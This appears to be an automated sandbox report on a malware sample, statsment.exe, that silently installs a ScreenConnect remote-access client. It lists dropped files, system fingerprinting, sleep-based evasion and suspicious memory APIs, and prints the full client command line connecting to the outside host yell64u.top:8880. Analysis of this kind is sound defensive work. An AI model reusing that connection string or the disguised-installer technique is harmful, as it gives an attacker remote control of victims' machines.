                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 4B40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 6280000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 59E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 7280000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 8280000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 6280000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 8510000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: 9510000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1B70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 3B70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1ADD0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1A9B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID756.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID438.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Users\user\Desktop\statsment.exe TID: 7696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 8100Thread sleep count: 44 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: setup.msi.0.drBinary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2995999567.0000000005090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.statsment.exe.2970000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.2.statsment.exe.5130000.1.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\statsment.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=groups&c=&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSICAFF.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
